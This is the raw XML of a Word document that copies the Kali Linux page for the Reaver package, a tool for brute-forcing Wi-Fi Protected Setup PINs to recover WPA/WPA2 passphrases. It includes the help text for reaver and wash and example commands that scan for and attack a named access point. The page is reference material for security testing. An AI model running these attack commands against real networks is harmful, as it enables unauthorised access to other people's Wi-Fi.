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6BDE8" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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555555"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reaver Package Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5670209B" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008F2641">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="447490"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>this paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F2641"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  <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269FC469" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3EAB69" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142CEFC" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Source: https://github.com/t6x/reaver-wps-fork-t6x</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008F2641">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="447490"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Reaver Homepage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F2641"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  <w:t> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008F2641">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="447490"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Kali Reaver Repo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B0B6C57" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Author: Tactical Network Solutions, Craig Heffner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30483ACB" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>License: GPLv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E045AE1" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Tools included in the reaver package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F6179" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F2641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color w:val="555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>reaver – WiFi Protected Setup Attack Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB42D7" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F2641">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1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</w:pP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root@kali:~# reaver -h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Reaver v1.6.5 WiFi Protected Setup Attack Tool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Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &lt;cheffner@tacnetsol.com&gt;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Required Arguments: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-i, --interface=&lt;wlan&gt;          Name of the monitor-mode interface to use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-b, --bssid=&lt;mac&gt;               BSSID of the target AP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Optional Arguments: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-m, --mac=&lt;mac&gt;                 MAC of the host system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-e, --essid=&lt;ssid&gt;              ESSID of the target AP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-c, --channel=&lt;channel&gt;         Set the 802.11 channel for the interface (implies -f)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-s, --session=&lt;file&gt;            Restore a previous session file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-C, --exec=&lt;command&gt;            Execute the supplied command upon successful pin recovery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-f, --fixed                     Disable channel hopping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-5, --5ghz                      Use 5GHz 802.11 channels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-v, --verbose                   Display non-critical warnings (-vv or -vvv for more)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-q, --quiet                     Only display critical messages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-h, --help                      Show help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Advanced Options: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-p, --pin=&lt;wps pin&gt;             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)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lastRenderedPageBreak/>
        <w:t>    -d, --delay=&lt;seconds&gt;           Set the delay between pin attempts [1]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-l, --lock-delay=&lt;seconds&gt;      Set the time to wait if the AP locks WPS pin attempts [60]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-g, --max-attempts=&lt;num&gt;        Quit after num pin attempts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-x, --fail-wait=&lt;seconds&gt;       Set the time to sleep after 10 unexpected failures [0]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-r, --recurring-delay=&lt;x:y&gt;     Sleep for y seconds every x pin attempts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-t, --timeout=&lt;seconds&gt;         Set the receive timeout period [10]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-T, --m57-timeout=&lt;seconds&gt;     Set the M5/M7 timeout period [0.40]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-A, --no-associate              Do not associate with the AP (association must be done by another application)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-N, --no-nacks                  Do not send NACK messages when out of order packets are received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-S, --dh-small                  Use small DH keys to improve crack speed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-L, --ignore-locks              Ignore locked state reported by the target AP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-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet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-J, --timeout-is-nack           Treat timeout as NACK (DIR-300/320)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-F, --ignore-fcs                Ignore frame checksum errors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-w, --win7                      Mimic a Windows 7 registrar [False]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-K, --pixie-dust                Run pixiedust attack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-Z                              Run pixiedust attack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Example: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reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FEA73" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>wash – WiFi Protected Setup Scan Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12822E66" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F2641">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1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</w:pP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root@kali:~# wash -h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Wash v1.6.5 WiFi Protected Setup Scan Tool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Copyright (c) 2011, Tactical Network Solutions, Craig Heffner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Required Arguments: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-i, --interface=&lt;iface&gt;              Interface to capture packets on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-f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files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Optional Arguments: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-c, --channel=&lt;num&gt;                  Channel to listen on [auto]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-n, --probes=&lt;num&gt;                   Maximum number of probes to send to each AP in scan mode [15]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-F, --ignore-fcs                     Ignore frame checksum errors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-2, --2ghz                           Use 2.4GHz 802.11 channels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-5, --5ghz                           Use 5GHz 802.11 channels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-s, --scan                           Use scan mode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-u, --survey                         Use survey mode [default]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-a, --all                            Show all APs, even those without WPS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-j, --json                           print extended WPS info as json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-U, --utf8                           Show UTF8 ESSID (does not sanitize ESSID, dangerous)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lastRenderedPageBreak/>
        <w:t>    -h, --help                           Show help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Example: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wash -i wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AB2C2" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>wash Usage Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E87CB1" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Scan for networks using the monitor mode interface </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-i wlan0mon)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t> on channel 6 </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-c 6)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t>, while ignoring frame checksum errors </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-C)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F045F54" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F2641">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1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</w:pP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root@kali:~# wash -i wlan0mon -c 6 -C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BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID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--------------------------------------------------------------------------------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E0:3F:49:6A:57:78    6  -73  1.0  No   Unknown   ASUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9E8DE" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F264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555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>reaver Usage Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF74DD6" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F26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</w:pPr>
      <w:r w:rsidRPr="008F2641"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  <w:t>Use the monitor mode interface </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-i mon0)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t> to attack the access point </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-b E0:3F:49:6A:57:78)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t>, displaying verbose output </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>(-v)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641"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  <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371E5A2" w14:textId="77777777" w:rsidR="008F2641" w:rsidRPr="008F2641" w:rsidRDefault="008F2641" w:rsidP="008F2641">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1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</w:pP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root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v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Reaver v1.6.5 WiFi Protected Setup Attack Tool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Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &lt;cheffner@tacnetsol.com&gt;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[+] Waiting for beacon from E0:3F:49:6A:57:78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[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2641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[+] Trying pin 12345670</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DC34E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BF2796"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3D6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BD"/>
    <w:rsid w:val="000964BD"/>
    <w:rsid w:val="008F2641"/>
    <w:rsid w:val="00A0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F8F29-3BDD-45B4-A915-C152CAEE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2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00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982426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898087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01149517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lab.com/kalilinux/packages/rea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6x/reaver-wps-fork-t6x" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sviehb.files.wordpress.com/2011/12/viehboeck_wps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833</Words>
  <Characters>4753</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2020-09-28T08:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-28T08:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>